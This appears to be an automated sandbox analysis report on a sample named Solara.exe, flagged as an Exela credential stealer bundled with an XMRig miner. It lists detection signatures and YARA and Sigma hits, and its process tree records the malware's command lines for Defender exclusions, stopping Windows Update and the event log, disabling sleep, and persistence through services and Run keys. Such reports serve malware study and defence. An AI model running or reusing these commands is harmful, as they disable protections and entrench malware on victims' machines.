Windows Analysis Report
Solara.exe

Overview

General Information

Sample name: Solara.exe
Analysis ID: 1589392
MD5: cc6d7a6b17febe201b7f7d26ce944c08
SHA1: 231e8439c0facca7cc4b730bf950351d48e3a7c2
SHA256: b1883486b5e6da993af6deb6f4d0f524ccdc6317bdc32ed50dccd1799867a3bd
Tags: exe, user-zhuzhu0009

Detection

Python Stealer, Exela Stealer, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Exela Stealer
Yara detected Python Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Creates multiple autostart registry keys
Detected generic credential text file
Drops PE files to the startup folder
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
Writes or reads registry keys via WMI
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Solara.exe (PID: 5852 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: CC6D7A6B17FEBE201B7F7D26CE944C08)
    • powershell.exe (PID: 1512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara.exe (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
      • powershell.exe (PID: 2468 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 5920 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 4704 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3416 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7144 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4360 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3180 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6904 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 1512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6380 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5868 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6064 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6044 cmdline: C:\Windows\system32\sc.exe delete "PGYNROQK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4304 cmdline: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4864 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6468 cmdline: C:\Windows\system32\sc.exe start "PGYNROQK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Exela.exe (PID: 7088 cmdline: "C:\Users\user~1\AppData\Local\Temp\Exela.exe" MD5: 0615D49BE12C174704A3DAAD945F7B56)
      • Exela.exe (PID: 2980 cmdline: "C:\Users\user~1\AppData\Local\Temp\Exela.exe" MD5: 0615D49BE12C174704A3DAAD945F7B56)
        • Conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rdqanwpudvuj.exe (PID: 7076 cmdline: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe MD5: 089094590DF5698B03A7428A5864ED33)
    • powershell.exe (PID: 1496 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1840 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6120 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • Conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6352 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 960 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6740 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4008 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1272 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5696 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5828 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5092 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3812 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 4300 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Solara.exe (PID: 3700 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
    • powershell.exe (PID: 2468 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Solara.exe (PID: 3896 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
        • powershell.exe (PID: 2044 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5980 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 4524 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 6352 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Solara.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 089094590DF5698B03A7428A5864ED33)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author | Strings
0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security
0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security
0000004D.00000002.2093996201.0000019BB72E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security
0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security
(5 of 18 memory-dump entries shown)

Source | Rule | Description | Author | Strings
66.2.conhost.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
66.2.conhost.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
66.2.conhost.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
66.2.conhost.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 2044, ParentProcessName: Solara.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6904, ProcessName: powercfg.exe

System Summary

                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Solara.exe, ProcessId: 5852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Solara.exe, ProcessId: 5852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Exela.exe, ProcessId: 2980, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Solara.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Solara.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ProcessId: 2044, ProcessName: Solara.exe
